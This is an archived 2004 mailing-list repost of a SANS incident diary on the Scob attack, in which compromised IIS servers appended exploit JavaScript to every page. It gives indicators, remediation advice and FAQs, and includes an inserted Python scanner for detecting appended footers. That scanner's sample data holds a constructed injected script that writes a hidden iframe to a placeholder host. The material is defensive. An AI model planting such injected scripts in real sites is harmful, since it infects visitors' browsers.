CRIME New IIS Worm

From: Brian Varine (witchdr@private)
Date: Fri Jun 25 2004 - 07:55:41 PDT


Via Incidents.org
Updated June 25th 2004 14:11 UTC (Handler: Deb Hale) 
Compromised Web Sites Infect Web Surfers
(for more details, also see yesterday's diary:
http://isc.sans.org/diary.php?date=2004-06-24 ) 
Updates will be posted here.


A large number of web sites, some of them quite popular, were compromised
earlier this week to distribute malicious code. The attacker uploaded a small
file with javascript to infected web sites, and altered the web server
configuration to append the script to all files served by the web server. The
Storm Center and others are still investigating the method used to compromise
the servers. Several server administrators reported that they were fully
patched. 

If a user visited an infected site, the javascript delivered by the site would
instruct the user's browser to download an executable from a Russian web site
and install it. Different executables were observed. These trojan horse
programs include keystroke loggers, proxy servers and other back doors
providing full access to the infected system. 

The javascript uses a so far unpatched vulnerability in MSIE to download and
execute the code. No warning will be displayed. The user does not have to
click on any links. Just visiting an infected site will trigger the exploit. 

If your SERVER was compromised, you will observe: 

* All files sent by the web server will include the javascript. As the
javascript is delivered by the web server as a global footer, images and other
documents (robots.txt, word files) will include the javascript as well.
* The files on your server will not be altered. The javascript is included as
a global footer and appended by the server as they are delivered to the
browser. 
* You will find that the global footer is set to a new file.
* For snort signatures, see http://www.bleedingsnort.com 


We do not know at this point how the affected servers have been compromised.
The SSL-PCT exploit is at the top of our list of suspects. If you find a
compromised server, we strongly recommend a complete rebuild. You may be able
to get your web site back into business by changing the footer setting and
removing the javascript file. But this is likely a very sophisticated attack
and you should expect other stealthy Backdoors. 

If you visited an affected page, and your BROWSER is compromised: 

* You may see a warning about a javascript error. But it depends on how the
attack code interferes with other javascript on the respective page, and many
users disable these javascript warnings. 
* Disconnect the system from the network as soon as possible.
* Run a thorough virus check with up to date virus definitions. Many AV
vendors released new definitions as recently as last night.
* If you are able to monitor traffic to the infected host, you may see
attempts to contact 217.107.218.147 on port 80.
* AV software will detect the javascript as 'JS.Scob.Trojan'. 

FAQs about this attack: 

- Is this the first time web servers have been compromised to attack browsers?

No. Nimda attempted the same trick, using an older MSIE exploit. Other
attempts have been observed in the past. This attack is special because it
affects a large number of servers and is not easily detectable. 

- Will affected websites be "defaced" or otherwise altered? 

No. In most cases, the web sites will look just like usual to the casual
browser. The infected javascript may interfere with other javascript on the
respective page. 

- Will the javascript attached to images be executed?

No. The javascript attached to images is harmless. It's the JavaScript
attached to the .htm or .html files that gets executed, forcing the browser to
connect to the Russian site. 
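The server-side indicators listed earlier and the image question just above rest on the same observation: IIS appends the footer file to every response after the real content, so the script lands past a JPEG's End-Of-Image marker, past </html>, or at the end of robots.txt, and the same tail shows up across files of different types while nothing on disk changes. The following Python scanner is added here as an illustration; it is not part of the ISC diary and not tooling from the incident. It checks served response bodies for exactly that pattern. The sample responses, the footer text and the 192.0.2.10 placeholder host are constructed for the example and do not reproduce the actual script or its hosting site.

```python
import re

# A <script> block, and any URL inside one (byte patterns, since bodies are raw).
SCRIPT_RE = re.compile(rb"<script\b.*?</script>", re.IGNORECASE | re.DOTALL)
URL_RE = re.compile(rb"""https?://[^\s'"<>)]+""", re.IGNORECASE)

# Where legitimate content ends for formats with an unambiguous trailer.
# Bytes after the trailer were appended by the server, not stored in the file.
TRAILERS = {
    "image/jpeg": b"\xff\xd9",              # JPEG End-Of-Image marker
    "image/png": b"IEND\xae\x42\x60\x82",   # IEND chunk type plus its fixed CRC
    "text/html": b"</html>",
}


def appended_tail(body: bytes, content_type: str) -> bytes:
    """Return the part of a response that follows the format's natural end."""
    ct = content_type.split(";")[0].strip().lower()
    trailer = TRAILERS.get(ct)
    if trailer is None:
        # text/plain, Word documents and so on: no script belongs anywhere in them.
        return body
    haystack = body.lower() if ct == "text/html" else body  # </HTML> vs </html>
    end = haystack.rfind(trailer)
    if end == -1:
        return b""  # no trailer: cannot tell where the real content stopped
    return body[end + len(trailer):]


def trailing_script(body: bytes, content_type: str):
    """The appended <script>...</script> block, or None if nothing was appended."""
    m = SCRIPT_RE.search(appended_tail(body, content_type))
    return m.group(0) if m else None


def common_suffix(bodies) -> bytes:
    """Longest byte string that every body ends with."""
    bodies = list(bodies)
    if not bodies:
        return b""
    n, limit = 0, min(len(b) for b in bodies)
    while n < limit and len({b[-1 - n] for b in bodies}) == 1:
        n += 1
    return bodies[0][len(bodies[0]) - n:]


def global_footer(bodies):
    """A script block shared by the tail of every response: the global-footer signature."""
    m = SCRIPT_RE.search(common_suffix(bodies))
    return m.group(0) if m else None


def script_urls(script: bytes):
    """Hosts the appended script sends the browser to."""
    return [u.decode("ascii", "replace") for u in URL_RE.findall(script)]


def scan(responses):
    """responses: iterable of (url, content_type, body). Per-URL hits plus the shared footer."""
    responses = list(responses)
    per_url = {}
    for url, ct, body in responses:
        s = trailing_script(body, ct)
        if s:
            per_url[url] = {"script": s, "urls": script_urls(s)}
    return {"per_url": per_url, "global_footer": global_footer(b for _, _, b in responses)}


# Constructed stand-in for the appended footer file (placeholder host, not the real script).
FOOTER = (b'<script language="javascript">'
          b"document.write(\"<iframe src='http://192.0.2.10/x.htm' width=0 height=0></iframe>\");"
          b"</script>\r\n")

# Constructed responses from a server with the footer appended to everything it serves.
INFECTED = [
    ("http://site.example/index.html", "text/html",
     b"<html><body><script>var page=1;</script></body></html>\r\n" + FOOTER),
    ("http://site.example/logo.jpg", "image/jpeg",
     b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 16 + b"\xff\xd9" + FOOTER),
    ("http://site.example/robots.txt", "text/plain",
     b"User-agent: *\r\nDisallow: /admin/\r\n" + FOOTER),
]
# The same server before the footer was set; index.html legitimately contains a script.
CLEAN = [(u, ct, b[: -len(FOOTER)] if b.endswith(FOOTER) else b) for u, ct, b in INFECTED]

if __name__ == "__main__":
    result = scan(INFECTED)
    for url, hit in result["per_url"].items():
        print(url, "-> appended script pointing at", hit["urls"])
    print("shared footer across all types:", result["global_footer"] is not None)
    print("clean server flagged:", bool(scan(CLEAN)["per_url"]))
```

To use it on real traffic, replace the constructed tuples with (url, Content-Type, body) captured from a proxy or fetched from the suspect server; since the files on disk are untouched, only served responses reveal the footer. A script the page itself ends with before </html> is not flagged, while a script after </html>, after a JPEG EOI marker, or anywhere in robots.txt is, and a script block that every response shares as its tail is reported as the global footer regardless of content type.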

- How can I protect my web server from becoming infected and used as a host
for the script? 

Apply all necessary patches. If you find an unpatched web server, assume it
has been compromised even if you do not see an obvious sign of an attack.
Given the current threat environment, an unpatched web server is likely to be
attacked successfully within a few hours. 

- How can I protect my users from these web sites? Do you publish a list?
Should they stop browsing? 

We do not provide a list of infected sites. Instead we try to work with site
administrators to have them shut down as soon as possible. Right now, we don't
know of any sites that are still hosting the script. Given that this attack is
likely going to be repeated using different javascript code, we recommend that
you (*) install and maintain anti-virus software, (*) if possible turn off
javascript, or use a browser other than MSIE until the current vulnerabilities
in MSIE are patched. 

Relevant Links 

Analysis of the underlying MSIE vulnerability:
! This link will trigger some warnings from AV software !
http://62.131.86.111/analysis.htm (thanks to Olivier de Jong)


Symantec writeup for js.scob.trojan:
http://securityresponse.symantec.com/avcenter/venc/data/js.scob.trojan.html 


MSIE Exploit information from Security Focus:
http://www.securityfocus.com/bid/10472 
http://www.securityfocus.com/bid/10473 
CHMM Vulnerability (not used here, but used by similar exploits):
http://www.securityfocus.com/bid/9658/info/ 


F-Secure Information:
http://www.f-secure.com/weblog/ 
http://www.f-secure.com/v-descs/scob.shtml 
http://www.f-secure.com/v-descs/padodorw.shtml 


Microsoft Alert:
http://www.microsoft.com/security/incident/download_ject.mspx 


UseNet Discussion about IIS exploits:
http://www.derkeiler.com/Newsgroups/microsoft.public.inetserver.iis.security/2004-06/0588.html



Snort Rule:
http://snort.infotex.com/cgi-bin/viewcvs.cgi/Stable/VIRUS_Unknown_IIS_Worm 



This archive was generated by hypermail 2b30 : Fri Jun 25 2004 - 08:35:21 PDT